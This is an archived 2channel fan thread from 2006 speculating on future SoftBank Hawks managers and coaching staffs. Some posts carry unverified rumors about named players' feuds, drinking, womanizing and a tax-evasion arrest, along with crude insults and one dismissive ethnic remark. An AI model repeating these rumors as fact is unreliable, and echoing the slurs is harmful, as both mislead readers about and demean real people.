2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

王→秋山→小久保監督が既定路線な件について

1 :代打名無し@実況は実況板で:2006/12/20(水) 10:57:27 ID:OHTgdGjd0
南海時代からずっと監督候補の
藤原満さんに一度くらいやらせてあげれば?

2 :代打名無し@実況は実況板で:2006/12/20(水) 10:57:56 ID:mHKlmNea0


3 :代打名無し@実況は実況板で:2006/12/20(水) 10:58:28 ID:dTRIRRUW0
オラオラ、たまちゃん様が3getしちゃうぞ〜?
ひれ伏せ無能な糞人間共めが!!!
〜⌒〜⌒〜⌒〜/⌒\〜⌒〜
⌒〜⌒〜⌒〜/  `・ω)ミ
〜⌒〜⌒〜⌒〜 U彡〜⌒〜⌒〜⌒
〜⌒〜⌒〜⌒〜⌒〜⌒〜⌒〜⌒〜⌒〜

>>2二足歩行でアザラシより早ぇの当たり前じゃんかよ(プ
>>4気安くたまちゃんなんて呼ぶんじゃねーよ童貞(プ
>>5デブヲタじゃ泳げないかな?(プ
>>6鶴見川より臭ぇぞ(プ
>>7俺をバックに家族で記念撮影なんかしてんじゃねーよ(プ
>>8海に帰れ?てめーが土に還れよキモいから(プ
>>9(俺以外)以下は鶴見川の水でも飲んでろってこった(ゲラ

4 :代打名無し@実況は実況板で:2006/12/20(水) 11:01:19 ID:cAN2KPZ40
杉浦の後は藤原満ではなくて、コーチの長池に決まってたらしいよ。球団の身売りでそれも立ち消えになって
杉浦がダイエー監督として続投したが、身売りが1年遅かったらダイエーの初代監督は長池だったはず。

5 :代打名無し@実況は実況板で:2006/12/20(水) 11:02:16 ID:SNu/kYai0
小久保→松中→城島→斉藤→和田・新垣→川崎→江川

6 :TDN:2006/12/20(水) 11:03:32 ID:0VD3J8kk0
小久保→松中→城島→斉藤→和田・多田野→川崎→江川

7 :代打名無し@実況は実況板で:2006/12/20(水) 11:37:16 ID:vFJ47l4ZO
小久保→松中→城島→多村(途中交代)→斉藤→川崎→多村(途中交代)→江川

8 :代打名無し@実況は実況板で:2006/12/20(水) 11:40:25 ID:nzd4NuQb0
2046年、王監督が電撃復帰!

9 :代打名無し@実況は実況板で:2006/12/20(水) 12:30:04 ID:u6HaPxNpO
2046年、イチローがホークス入団!!
一番打者で起用

10 :代打名無し@実況は実況板で:2006/12/20(水) 15:25:56 ID:1btIARSr0
〜2007 王 (体調面の問題で勇退)
'08-09  秋山 (意外に成績ふるわず2年で解任)
'10-11 新井 (連続優勝を果たすも小久保に禅譲)
'12〜 小久保 (新井政権でのヘッドコーチから昇格)

11 :代打名無し@実況は実況板で:2006/12/20(水) 15:32:43 ID:HSSwkyzK0
便器の人事問題なんかどうでもいい

12 :代打名無し@実況は実況板で:2006/12/20(水) 15:45:00 ID:jSG3AuCyO
10年後
王終身名誉監督兼GM
秋山監督
小久保ヘッドコーチ
松中打撃コーチ
井口内野守備走塁コーチ
城島バッテリーコーチ
大村外野守備走塁コーチ
多村コンディションコーチ

13 :代打名無し@実況は実況板で:2006/12/20(水) 15:46:36 ID:Xaj7fg9HO
松中は石毛みたいに空回りして終りそう


14 :代打名無し@実況は実況版で:2006/12/20(水) 15:47:49 ID:LPqOBSxz0
なんとも王が辞めたら地味なのばかりだな

15 :代打名無し@実況は実況板で:2006/12/20(水) 16:00:59 ID:y++YJ2mA0
>>12
ちょw最後w

16 :代打名無し@実況は実況板で:2006/12/20(水) 16:54:47 ID:IeHgawXD0
秋山監督
小久保ヘッドコーチ
松中打撃コーチ
井口内野守備走塁コーチ
城島バッテリーコーチ

ここら辺ってみんな我が強くて喧嘩しそうなイメージなんだけど

17 :代打名無し@実況は実況板で:2006/12/20(水) 17:40:15 ID:J+mfgJHD0
>>16
人間の屑の井口なんか、いらねーよ

18 :代打名無し@実況は実況板で:2006/12/20(水) 18:00:26 ID:i0eNQBD50
>>12
あと1年で王政権終了として、
その後9年間も秋山が監督やってるとは思えん。

19 :代打名無し@実況は実況板で:2006/12/20(水) 19:11:16 ID:6R1jJLML0
中内馬鹿息子は、王に変えてハイディを監督にしようとしていたよね。

小久保もホークスに戻ったし、中内馬鹿は今頃、何してんだろう。

20 :代打名無し@実況は実況板で:2006/12/20(水) 19:18:40 ID:cQwnLonF0
稲尾監督ももう一度見てみたい。

21 :代打名無し@実況は実況板で:2006/12/20(水) 19:26:50 ID:cQwnLonF0
さすがに今年みたいなことでもない限り、森脇監督は二度とないですよねえ。

22 :代打名無し@実況は実況板で:2006/12/20(水) 19:26:55 ID:M1ACB9Cj0
>>10
新井タソが藤田元司みたいな感じか。

23 :代打名無し@実況は実況板で:2006/12/20(水) 19:29:44 ID:cQwnLonF0
監督というのはやはり専門の能力がいるんですね、、、。

24 :代打名無し@実況は実況板で:2006/12/20(水) 19:43:50 ID:BmdI/gBzO
>>1
藤原さんの実況解説は好きだ。1001と違って偏ってない、選手を罵らない。
他球団の選手も公平によく見てるし、話し方が柔らかいので
厳しいことを言ってても、なるほどなと素直に思える。

25 :代打名無し@実況は実況板で:2006/12/20(水) 19:45:26 ID:cQwnLonF0
藤原満と言えばあぶさんによく出てきてた。

本当にあんなキャラなん?

26 :代打名無し@実況は実況板で:2006/12/20(水) 20:48:22 ID:oDUTfiXh0
>>16
実際松中・井口・城島は我が強くて張り合ってたらしいけどな
それをうまく小久保がなだめていい方向へ持っていってた

27 :代打名無し@実況は実況板で:2006/12/20(水) 21:32:39 ID:cQwnLonF0
松中、井口は入団の経緯から仲がいいとおもってました、、、。

28 :代打名無し@実況は実況板で:2006/12/20(水) 21:56:43 ID:u+yW35Zu0
小久保は過去に脱税で捕まっている
ので監督はどうやろ?

29 :代打名無し@実況は実況板で:2006/12/20(水) 21:59:05 ID:5kmZXE9u0
在日ばかりw

30 :代打名無し@実況は実況板で:2006/12/20(水) 22:00:28 ID:cQwnLonF0
小久保が監督になるのはまず間違いないから。

31 :代打名無し@実況は実況板で:2006/12/20(水) 22:13:16 ID:97Oo2/bf0
秋山→小久保→城島→川崎

まぁ、こうだろうな。
現実的に考えて。


32 :代打名無し@実況は実況板で:2006/12/20(水) 22:32:25 ID:rEYzym420
2050年
王永久監督(故人)
秋山名誉監督
小久保総監督
城島監督代行
川ア助監督

33 :代打名無し@実況は実況板で:2006/12/20(水) 22:56:03 ID:YFBucijW0
秋山監督で長池がヘッドで入閣だろう
新井 森脇 井出はそのままで

杉本プラス誰か欲しい

工藤が最強なんだがな・・・ 


34 :代打名無し@実況は実況板で:2006/12/20(水) 22:58:24 ID:nhKBe08b0
ヒルマン→白井→田中→金子

35 :代打名無し@実況は実況板で:2006/12/20(水) 23:01:45 ID:cQwnLonF0
ならおれも。

伊東→渡辺久信→東尾→田淵

36 :代打名無し@実況は実況板で:2006/12/20(水) 23:07:49 ID:jSG3AuCyO
広島
ブラウン→野村→佐々岡→黒田?

37 :代打名無し@実況は実況板で:2006/12/20(水) 23:12:11 ID:ep7jVdRuO
これ最強
王GM兼終身名誉監督
秋山監督
新井チーフ兼打撃コーチ
大道打撃コーチ補佐
工藤投手総合コーチ
若田部投手コーチ
吉田修ブルペンコーチ
吉永バッテリーコーチ
佐々木外野守備走塁コーチ
森脇内野守備走塁コーチ
若井ベンチコーチ
再来年辺りこの首脳陣でやってみたい
豪華過ぎるが

38 :代打名無し@実況は実況板で:2006/12/20(水) 23:19:54 ID:sfMXXT0FO
>>36
黒田は間違いないな。

39 :代打名無し@実況は実況板で:2006/12/20(水) 23:22:12 ID:8keCFJPi0
王→森脇→タネル→鳥越

40 :代打名無し@実況は実況板で:2006/12/20(水) 23:22:23 ID:NsUgG11z0
秋山って策士って感じしないね
王以上にオーソドックスな采配しそう

41 :代打名無し@実況は実況板で:2006/12/20(水) 23:24:14 ID:cQwnLonF0
王→浜ぎわ→本原→脇坂、、、。どんどんマニアックに。

42 :代打名無し@実況は実況板で:2006/12/20(水) 23:28:42 ID:ep7jVdRuO
王→秋山→新井→工藤→新井→秋山→小久保→若田部→小久保
巨人みたいになるとこうなる

43 :代打名無し@実況は実況板で:2006/12/20(水) 23:29:54 ID:LXDCzhMb0
秋山はホームラン大好き

44 :代打名無し@実況は実況板で:2006/12/20(水) 23:30:04 ID:cQwnLonF0
若田部はない!!

45 :代打名無し@実況は実況板で:2006/12/20(水) 23:30:21 ID:/yab8kQX0
>>40
オーソドックスなイメージ有るが意外と策士だったりして
やってみないと分からん

46 :代打名無し@実況は実況板で:2006/12/20(水) 23:33:38 ID:cQwnLonF0
のむさんみたいでなくていい。

正攻法で押しておいていざというときの奇策。是が効くんだよ。

正直者がつく嘘ほどだまされるものは無い!

47 :代打名無し@実況は実況板で:2006/12/20(水) 23:33:45 ID:ep7jVdRuO
>>45 明らかに森監督のような采配はしないはずだと思う。

48 :代打名無し@実況は実況板で:2006/12/20(水) 23:38:04 ID:NsUgG11z0
>>46
野球でそんなものが通用するのか
ある程度ギャンブルも必要だろ
それで勝てるならいいが
弱かったら田淵の二の舞だよ


49 :代打名無し@実況は実況板で:2006/12/21(木) 00:09:52 ID:9QAk1Oii0
>>48

通用するんだよ。それが。

でも奇策であったとさえ気づかれない可能性がたかいけどな。

50 :代打名無し@実況は実況板で:2006/12/21(木) 00:10:16 ID:jKX5gsA80
あげ

51 :代打名無し@実況は実況板で:2006/12/21(木) 00:11:16 ID:Ff6JNDNw0
奇策とは成功してこそ奇策。失敗したらそれはただの愚行

52 :代打名無し@実況は実況板で:2006/12/21(木) 00:12:52 ID:9QAk1Oii0
>>51

なにそれ? イチローが うーん とかいいながら語ってるテレビ番組??

53 :代打名無し@実況は実況板で:2006/12/21(木) 00:17:09 ID:PDDaHeld0
奇策は成功する事が大事なわけではない。
普段のオーソドックススタイルの時に何をするか分らないという
恐怖感を相手に植え付けるのが最も大きい目的。
森監督は実際に、それで成功してた。
逆に奇策を絶対に用いない近藤昭仁監督は采配が100%相手に読まれて
バントやスクイズの成功率が極めて悪かった。
たまに奇策を織り交ぜないと普段の野球だけでは相手に読まれてしまう。

54 :代打名無し@実況は実況板で:2006/12/21(木) 00:23:45 ID:DVU4Mb0E0
王さんの奇策って三瀬を使い続けることなんだろうか
確かに恐怖感を与えてはいる

55 :代打名無し@実況は実況板で:2006/12/21(木) 00:24:38 ID:Os9Wc1VV0
秋山のトリックプレーとか有名だったじゃないか。元々そういう事をさりげなくやる人でもある。意外に食えないと予想。

ガチで監督に向かないのは松中かな。小久保や城島はバランス取れそうだけど、松中にはマグマを感じる。

56 :代打名無し@実況は実況板で:2006/12/21(木) 00:26:11 ID:9QAk1Oii0
>>48

確かに田淵は奇策の監督ではなかったね。

気さくな監督ではあったが。

57 :代打名無し@実況は実況板で:2006/12/21(木) 00:29:27 ID:24GUbJbd0



王→秋山→鳥越→的場→新垣





58 :代打名無し@実況は実況板で:2006/12/21(木) 00:50:10 ID:DVU4Mb0E0
オリ時代の仰木監督なんて毎日が奇策だったね
「そうしないと勝てない」って言ってたし


59 :代打名無し@実況は実況板で:2006/12/21(木) 00:52:34 ID:jOTF6LrNO
俺は他チームファソなんで、ホークスの内情に詳しくないが、
何かで秋山の監督は結構ヤバい(悪い意味で)と聞いた事がある。
今は二軍に於いて、ある意味秋山自身が修行中だが、実際はどうなのだろうか?

60 :代打名無し@実況は実況板で:2006/12/21(木) 01:00:08 ID:Ff6JNDNw0
>>59
秋山は今1軍のコーチだよ

61 :代打名無し@実況は実況板で:2006/12/21(木) 01:04:52 ID:Os9Wc1VV0
>>59
とにかく厳しいとは聞くね。根性主義なのは石毛の時と被る部分もあるけど、石毛はジャンケンでオーダー決めたり、金で揉めたりトラブルが多かった。そういう話は今の所ないかな。

62 :代打名無し@実況は実況板で:2006/12/21(木) 01:06:02 ID:nhY2x5+g0
>>59
秋山さんのおかげで2軍が復活できたから、
采配はともかく育成面ではいい監督です。

63 :代打名無し@実況は実況板で:2006/12/21(木) 01:35:04 ID:JZzTx6Uh0
>>39
タネルw
初めて平和台に行った時に投げてたよ、懐かしい…

64 :代打名無し@実況は実況板で:2006/12/21(木) 02:31:42 ID:DErscM680
タネルは今年シンシナティ・レッズの投手コーチしてたよ

65 :代打名無し@実況は実況板で:2006/12/21(木) 04:45:37 ID:XEGJGzLK0
バレンタイン→初芝→堀→福浦→里崎

66 :代打名無し@実況は実況板で:2006/12/21(木) 12:20:25 ID:z5K19LAMO
>>65
初芝→小宮山→黒木では?

黒木は前エースとはいえまともに試合すら出てないのに解雇しないとこをみると指導者としての期待もみえる

67 :代打名無し@実況は実況板で:2006/12/21(木) 16:39:58 ID:pXyPx+cQ0
ロッテの場合、個人的には
ボビー→初芝→落合→黒木をキボン

68 :代打名無し@実況は実況板で:2006/12/21(木) 16:48:40 ID:7eAUcsBDO
>>67
落合はなさそう…解説時代はたまにキャンプ見に行ったりしてたみたいだけどね。
それよりもロッテは倉持さんを入閣させるべき。


秋山「監督」ってなんかイメージないんだよなぁ…
なったらなったでチームのイメージは明るくなりそうだけど。

69 :代打名無し@実況は実況板で:2006/12/21(木) 16:52:51 ID:i9eRbm450
>>55
ベンチ前で率先して選手の目前で呆然とされたら
選手はやってられないだろうからなw

70 :代打名無し@実況は実況板で:2006/12/21(木) 17:08:43 ID:uwg6OZZ80
松中は監督になったら重圧で体調崩しそう

71 :代打名無し@実況は実況板で:2006/12/21(木) 17:16:40 ID:R/XzbPo/0
松中が監督になったら、ベンチが必要以上に重苦しくなりそうでやだな

72 :代打名無し@実況は実況板で:2006/12/21(木) 19:41:16 ID:z5K19LAMO
松中にしろ和巳にしろ鬼の形相で野球やられてもな(´・ω・`)

73 :代打名無し@実況は実況板で:2006/12/21(木) 19:42:58 ID:ced1FdlvO
かつての王みたいだ

74 :代打名無し@実況は実況板で:2006/12/21(木) 21:46:43 ID:/V4HKtKH0
秋山、小久保は仲がいいねえ。



75 :代打名無し@実況は実況板で:2006/12/21(木) 21:49:08 ID:dQt4u33K0
>>16
井口と城島は仲がいい
小久保と松中も仲がいい
井口と松中はよくない

あとは知らない

76 :代打名無し@実況は実況板で:2006/12/21(木) 21:52:14 ID:/V4HKtKH0
井口、松中はアマ時代は親友でしたよ。
入団後の経過はしらぬが。

77 :代打名無し@実況は実況板で:2006/12/21(木) 21:53:31 ID:7soKAlMI0
>>75
小久保と井口は青山学院大の先輩後輩だから仲いいっていつぞやの記事で見た

78 :代打名無し@実況は実況板で:2006/12/21(木) 21:54:45 ID:DQcFo2iQO
城島と松中はガチで仲がわるい。
斉藤も監督確かに無理だな。

79 :代打名無し@実況は実況板で:2006/12/21(木) 21:56:51 ID:/V4HKtKH0
小久保が和巳をかわいがってるときいたときには、なんであんなアホを!?とおもったが。
和巳、なかなかリーダーの資質があるようだ。後輩がなぜかエースは和巳さん。と数年前からいってたからな、、。

80 :代打名無し@実況は実況板で:2006/12/21(木) 21:59:53 ID:Gy7yuBxoO
ひとごとながら、巨人が気になる。
マジで原の後はどうするんだろ?

81 :代打名無し@実況は実況板で:2006/12/21(木) 22:01:09 ID:/V4HKtKH0
もう江川しか無いだろ。

82 :代打名無し@実況は実況板で:2006/12/21(木) 22:06:54 ID:/V4HKtKH0
江川でこけたら徳光で。

83 :代打名無し@実況は実況板で:2006/12/21(木) 22:13:43 ID:/V4HKtKH0
徳光の涙が涸れたら、元木だね

84 :代打名無し@実況は実況板で:2006/12/21(木) 22:14:35 ID:EaaRMhf+O
>>36
遅レスだが佐々岡や黒田の前に大野の入閣が見たい。

85 :代打名無し@実況は実況板で:2006/12/21(木) 22:15:52 ID:/V4HKtKH0
元木が巨人の監督になったらネラーがこぞって球場に行くよ。
で、

86 :代打名無し@実況は実況板で:2006/12/21(木) 22:17:41 ID:70gO/kJ5O
元木氏ね

87 :代打名無し@実況は実況板で:2006/12/21(木) 22:39:39 ID:Z7zbERUI0
>>78
城島と松中は
2004年のプレーオフ惜敗をきっかけに良好な関係になったのは有名だが?


井口と松中はマジで悪い
試合中の内野ボール回しとか見ててわかるくらいだった

88 :代打名無し@実況は実況板で:2006/12/21(木) 22:42:44 ID:eAKJp2pP0
>>78
福岡空港で松中のヒザに座って笑ってる城島を見たけどな

89 :代打名無し@実況は実況板で:2006/12/21(木) 22:44:19 ID:yxANcZYg0
>>88
それは座位

90 :代打名無し@実況は実況板で:2006/12/21(木) 23:19:08 ID:ET2nWvOaO
巨人の次は吉村

91 :代打名無し@実況は実況板で:2006/12/21(木) 23:43:29 ID:Z7HcmY//0
ヤクルトも古田→宮本→若松→古田が既定路線

92 :代打名無し@実況は実況板で:2006/12/22(金) 00:20:03 ID:QFflknDS0
松中は無視か

93 :代打名無し@実況は実況板で:2006/12/22(金) 00:50:41 ID:I5V2FwgD0
>>89
アッー!

94 :代打名無し@実況は実況板で:2006/12/22(金) 11:04:51 ID:0n4yuOHi0
秋山って二軍監督時代はどうだったの?

95 :代打名無し@実況は実況板で:2006/12/22(金) 11:16:14 ID:OblUEuaB0
>>94
鬼軍曹。自ら一緒に体を動かすタイプで若手を練習付け。
二軍だから采配とかは分からん。


96 :代打名無し@実況は実況板で:2006/12/22(金) 11:38:24 ID:A6qVk9idO
大矢→佐々木→石井琢朗→鈴木→佐ry

97 :代打名無し@実況は実況板で:2006/12/22(金) 11:40:15 ID:F8IC2Rl+O
オリなんか球団存続すらどうだかわからんのに…

98 :代打名無し@実況は実況板で:2006/12/22(金) 12:31:44 ID:WeZ79gzu0
すべては平成5年ドラフト

99 :代打名無し@実況は実況板で:2006/12/22(金) 12:43:48 ID:lAJdJAPaO
小久保は生え抜きとか言って
某新聞球団が監督要請しそうだな

100 :代打名無し@実況は実況板で:2006/12/22(金) 12:53:00 ID:hEBb8BzL0
>>94
選手とのキャッチボールでものすごい球投げてたw

101 :代打名無し@実況は実況板で:2006/12/22(金) 13:04:06 ID:4Rqx+e21O
落合→川相→立浪→井端→山本名誉選手兼監督

102 :代打名無し@実況は実況板で:2006/12/22(金) 16:55:02 ID:+wEKEsld0
>>87
城島と松中は、それまでは仲悪かったのか 知らなかった
だが、松中も城島もコーチになると派閥ができそうだ

>試合中の内野ボール回しとか見ててわかるくらいだった

井口も松中もいやそうに、しぶしぶ回してたのかな?
それとも全然、お互いにボール回さなかったの?

103 :代打名無し@実況は実況板で:2006/12/22(金) 18:09:05 ID:OblUEuaB0
>>102
一説によると井口と仲の良い城島は井口に遠慮して松中と距離を置いていたとかなんとか。
2004年オフに井口がチーム出たから、それ以降は普通に接してるとかなんとか。
まあ、井口と松中が仲悪いつーのだけはガチっぽいね。

104 :代打名無し@実況は実況板で:2006/12/22(金) 18:45:31 ID:5vrO8t5W0
>>103
どれだけ本当の情報か知らんが
ストイックな松中とマイペースな井口じゃ合いそうにないな

105 :代打名無し@実況は実況板で:2006/12/22(金) 18:51:53 ID:60pyl8qq0
秋山が監督になると誰が入閣するんだろう?
自前のブレーンはあまり居なさそうだが・・・。

106 :代打名無し@実況は実況板で:2006/12/22(金) 18:56:55 ID:FnRzx2Rv0
>>105
元西武が集結するから心配ないだろ

107 :代打名無し@実況は実況板で:2006/12/22(金) 18:57:08 ID:A8EIQISU0
井口は守備ではやく一軍で使ってもらえて優遇されてたからなあ。

二軍で石毛に泣かされた松中としてはむかついたんだろうなあ、、。

108 :代打名無し@実況は実況板で:2006/12/22(金) 18:58:31 ID:FnRzx2Rv0
>>107
当時松中はポンコツだったから石毛のやったことは正しい

109 :代打名無し@実況は実況板で:2006/12/22(金) 18:59:02 ID:E0Lq9ydl0
秋山を放出した西武は残念なことをしたな

110 :代打名無し@実況は実況板で:2006/12/22(金) 19:00:28 ID:+wEKEsld0
>>105
意表をついて柴原w 
だが、どうみてもブレーンってポジションじゃないな 
自分の崇拝者ってだけだもんな

>>106
引っ張ってくるだろうか

111 :代打名無し@実況は実況板で:2006/12/22(金) 19:18:20 ID:FnRzx2Rv0
>>110
引っ張ってこれなければホークスは崩壊だろ
ホークスには人材いないもん

112 :代打名無し@実況は実況板で:2006/12/22(金) 20:36:39 ID:LSaX0jwlO
工藤は入閣しそうだな
個人的には羽生田に外野守備コーチをしてほしいがw

113 :代打名無し@実況は実況板で:2006/12/22(金) 21:40:13 ID:pxneoUGn0
原→中畑→工藤→吉村→桑田→松井

114 :代打名無し@実況は実況板で:2006/12/23(土) 02:30:10 ID:bU0VUkpjO
もうあぶさんでいい

115 :代打名無し@実況は実況板で:2006/12/23(土) 05:22:53 ID:Kkz4/T2U0
あぶさん→岩鬼だな

116 :代打名無し@実況は実況板で:2006/12/23(土) 05:26:44 ID:MuALHn3mO
ふっ

117 :代打名無し@実況は実況板で:2006/12/23(土) 05:54:40 ID:VjJHAc/40
秋山は二軍の練習でイチローの背面キャッチやってみせたらしいな。打球と自分のグラブの位置を正確に見極めればできるとか。

118 :代打名無し@実況は実況板で:2006/12/23(土) 06:47:43 ID:t+HXqzzuO
外野守備走塁コーチに佐々木誠の名前が無いようだが…?

119 :代打名無し@実況は実況板で:2006/12/23(土) 06:52:01 ID:n+xpmpRK0
バッテリーコーチに香川の名前が無いようだが…?

120 :代打名無し@実況は実況板で:2006/12/23(土) 07:07:58 ID:C5Fgm4ErO
秋山が監督のうちに清原対秋山監督対決が見たいが、清原監督はないかな〜。


121 :代打名無し@実況は実況板で:2006/12/23(土) 07:21:07 ID:t+HXqzzuO
2016年日本シリーズ…

クライマックスシリーズwセパ3位にギリギリで滑り込み、奇跡的に勝ち上がった両者の対決。
桑田監督率いる読売VS清原監督率いる檻牛のKK対決w

その時までCSと銘打ってPOやってるかはわからんがw

122 :代打名無し@実況は実況板で:2006/12/23(土) 07:21:14 ID:tnpaCbguO
数年後

秋山監督
新井チーフ兼打撃コーチ
大道打撃コーチ
工藤投手コーチ
吉田修ブルペン投手コーチ
森脇内野守備走塁コーチ
井出外野守備走塁コーチ


実況「どうでしたか今日の試合は。解説の柴原さん」
柴原「やっぱり秋山監督の采配は素晴らしいですね」
実況「ええ、そうですねはいはい」

こんなところがリアル

123 :代打名無し@実況は実況板で:2006/12/23(土) 07:48:43 ID:7GtDWSPvP
実況「どうでしたか、解説の鳥越さん」
鳥越「ん〜、ええんちゃう?」
実況「はい…。それでは今日の試合のハイライトをどうぞ」

124 :代打名無し@実況は実況板で:2006/12/23(土) 08:00:21 ID:xpOtBn2+0
>>103-104
うろ憶えだが・・・
アマ時代からのつながりで入団時から仲が良かった井口と松中は
松中の深酒を心配した井口が諌めた(「アスリートとしてどうかと
思う」ようなことを言ったらしい)ところ松中が「余計なお世話」と
不機嫌になった。でもってあの禿は女の腐ったのみたいにうじうじ
ぐじぐじだし、井口は井口であっさり「よかれと思って言ったんだけど
じゃあいいよ、あんたの人生なんだし」と松中との距離をおくことに。
こんな経緯じゃなかったかなぁ?
誰か詳しい人補完して

125 :代打名無し@実況は実況板で:2006/12/23(土) 08:06:34 ID:INy3HD5F0
>>124
なんか、嘘くせえw

126 :代打名無し@実況は実況板で:2006/12/23(土) 08:09:28 ID:vU1nK6lq0
浜名とか若田部とかはコーチやらないのか?
一年で辞めた柳田なんていいコーチになると思うけどな。

>>122
>実況「ええ、そうですねはいはい」
ワロタ

127 :代打名無し@実況は実況板で:2006/12/23(土) 08:47:00 ID:VjJHAc/40
>>124
俺が聞いたのは全く逆で、そもそも井口の女グセの酷さを松中がたしなめた。それに井口がお前の酒はどうなんだよ、と言い返してケンカ。どっちもどっちだわな。松中が一方的に悪いみたいな言い方はおかしい。

>>126
柳田は指導がダメとかではないっぽいが、元々かなり毒舌で偏屈なので揉めたっぽい。猫の伊原みたいだなw

128 :代打名無し@実況は実況板で:2006/12/23(土) 09:23:56 ID:3Bk4xq7i0
>>124
井口が松中の日常を苦々しく思っていたのは本当みたいだね。
どっちも小久保を慕う気持ちで一致してたから、そこでどうにか
まとまってたような感じだ。
ジョーはああ見えて冷静で、こんな露骨な敵対関係を人と作らない
のが偉い。松中にリーダーとしての欠陥があるのは凄くわかる。
熱ければいいってもんじゃない。

129 :代打名無し@実況は実況板で:2006/12/23(土) 12:46:41 ID:YO5I3RtH0
まあよくココまで松中憎めるもんだと感心するよ

130 :代打名無し@実況は実況板で:2006/12/23(土) 14:31:04 ID:lUyOQvNo0
別に、松中のことを憎んでるわけじゃないんじゃ?
松中がトップに立ったらベンチやりにくそうだな、とか
松中の交友関係を話題にしているだけで、実際のことはわかんないんだし
>>129は松中ファンだろうけど、それで、書いてあることが松中憎しに読めるんだろうけど

131 :代打名無し@実況は実況板で:2006/12/23(土) 15:20:58 ID:YO5I3RtH0
>>130
アノネ
特に松中に対して思い入れが有るわけじゃないが

>>124
>でもってあの禿は女の腐ったのみたいにうじうじぐじぐじだし、

なんてカキコみるとそう思いたくなるのが普通でしょ?



132 :代打名無し@実況は実況板で:2006/12/23(土) 15:27:05 ID:kZ6CcQ3t0
>>131
ちゃんとアンカー付けないと誤解されるよ。

つーか、なんでこのスレは内紛暴露の流れになってるんだ?w

133 :代打名無し@実況は実況板で:2006/12/23(土) 15:59:27 ID:YO5I3RtH0
>>132
>>128>>124からの流れで
>こんな露骨な敵対関係
>松中にリーダーとしての欠陥がある

なんて言ってるんだから似たようなものだなと思う
シーズン中に手術しながらよく頑張ったと思うけどな

134 :代打名無し@実況は実況板で:2006/12/23(土) 17:31:40 ID:VjJHAc/40
そもそも井口の人間性は相当アレなんだとしか思えない。裏契約でメジャー行き、松井の尻馬に乗って王さんのWBC招集を断る。成績も本当に良かったのは最後の二年だけなのに。

これじゃホークスと王さんに後ろ足で砂をかけてったようなもんだ。いくらメジャーで活躍しようが応援したくないね。

135 :代打名無し@実況は実況板で:2006/12/23(土) 20:09:51 ID:lu0QisH30
秋山監督は別にいいけど、小久保監督って吐き気がするよ

136 :代打名無し@実況は実況板で:2006/12/23(土) 21:37:57 ID:oyr1N1x40
>>113
2人目で崩壊しそうだが

137 :代打名無し@実況は実況板で:2006/12/23(土) 21:45:43 ID:vqwi7Tye0
今月の月刊ホークス、立ち読みしたんだけど、、。

小久保はやはり特別だよねえ、、。

138 :代打名無し@実況は実況板で:2006/12/23(土) 21:52:29 ID:vqwi7Tye0
井口は確かにようやく才能開花,という一番いい時期にメジャーにいけたね。

139 :代打名無し@実況は実況板で:2006/12/23(土) 21:53:16 ID:oyr1N1x40
一番おいしい奴だな

140 :代打名無し@実況は実況板で:2006/12/24(日) 00:54:10 ID:Zq6VbC2o0
>>133
そりゃ、鷹ファンだし、松中には途中まではもう見るたび涙出そうだったよ、
今年。だけど、後半は頼むから出ないでくれって状況に
なっていった。毎試合見てればこんな気持ちになったって、松中叩きひどい
って思わないはず。あの頃本スレのほとんどが自分がチームの全てと思うな
松中ってレスばっかだったし。松中も井口も城島も、自分にとっては横一線で松中1人
がどうかなんて思ってない。けど、リーダーの適正は自分から見たら小久保
あたりとは比較にならんと思う。

141 :代打名無し@実況は実況板で:2006/12/24(日) 14:17:48 ID:wE3msl510
>>136
すでに1人目で崩壊しかけているがw

142 :代打名無し@実況は実況板で:2006/12/25(月) 00:20:40 ID:25ag0xDE0
>>140
どうでもいいが、改行が変な位置すぎて(携帯からならまだしも)
読みづらいことこの上ないので、書き込む前に、一度、構文をチェックしてくれないか

143 :代打名無し@実況は実況板で:2006/12/25(月) 02:55:01 ID:TFi4Hqw30
MLBに行った二人は監督へのパスポートと引き換えに
出てったんだから。

終身契約組は監督内定だろ。
後も詰まってるので来年はどんな手を使ってでも日本一になって
王監督有終の美、がお約束。
多分読売系も絡んでマスコミも後押しするはず。
邪魔しそうなのは空気が読めない西武くらい。

144 :代打名無し@実況は実況板で:2006/12/25(月) 11:14:37 ID:9oTuznRg0
2人いうな。城島は将来の幹部候補だぞ。
井口は完全に縁切ったけどな。

145 :代打名無し@実況は実況板で:2006/12/25(月) 12:16:39 ID:3uA1bDFr0
>>143を要約すると、来年は王監督最終年であるソフトバンクが
孫マネーをばらまいて八百長により優勝するということですね?

146 :代打名無し@実況は実況板で:2006/12/25(月) 12:19:24 ID:1j7+5WHU0
八百長なんてしなくても優勝はできそうだけどな。優勝はな。

147 :代打名無し@実況は実況板で:2006/12/25(月) 21:11:33 ID:x0Aem6xp0
>>140
工作員の誘導にまんまと引っ掛かったわけねw

148 :代打名無し@実況は実況板で:2006/12/25(月) 23:16:03 ID:NFmkABbd0
>>143
SB日本一が「世間の空気」だというのがちゃんちゃらおかしい

149 :代打名無し@実況は実況板で:2006/12/25(月) 23:20:02 ID:TFi4Hqw30
>>148
まあ、現実見えない人がおかしがる分には勝手だが。
世間の賛同は、チームにというより王監督個人に集まる。

150 :代打名無し@実況は実況板で:2006/12/25(月) 23:31:13 ID:NFmkABbd0
>>149
それなら今年もそういう空気になっておかしくなかったが、
現実は 新庄>>>>王

151 :代打名無し@実況は実況板で:2006/12/25(月) 23:47:23 ID:TFi4Hqw30
来年新庄いないし。

152 :代打名無し@実況は実況板で:2006/12/26(火) 00:22:00 ID:II7N1Hfq0
>>147
そんなに面白い?


153 :代打名無し@実況は実況板で:2006/12/26(火) 11:06:00 ID:DkT9Mm9U0
小久保は国際試合が怖いチキン野郎だ。

154 :代打名無し@実況は実況板で:2006/12/27(水) 00:58:29 ID:yMBQ2VJ+0
孫は「王さんには死ぬまでやってもらう」って言ってなかったっけ?

155 :代打名無し@実況は実況板で:2006/12/27(水) 01:11:50 ID:3Y0LR8nQ0
>>154
今となってはあんまり笑えない台詞だ。

156 :代打名無し@実況は実況板で:2006/12/27(水) 06:41:57 ID:sXnV0XC40
え〜っと・・
つまりそれはあと何年ってこと?

157 :代打名無し@実況は実況板で:2006/12/28(木) 09:54:56 ID:wEa5osv70
清原が引退後そのままオリの監督に就任し、
秋山vs清原監督というAK対決を西武以外同士で見てみたい。

158 :代打名無し@実況は実況板で:2006/12/28(木) 10:00:39 ID:p89VDLqgO
来年は巨人(笑)が日本一だろw

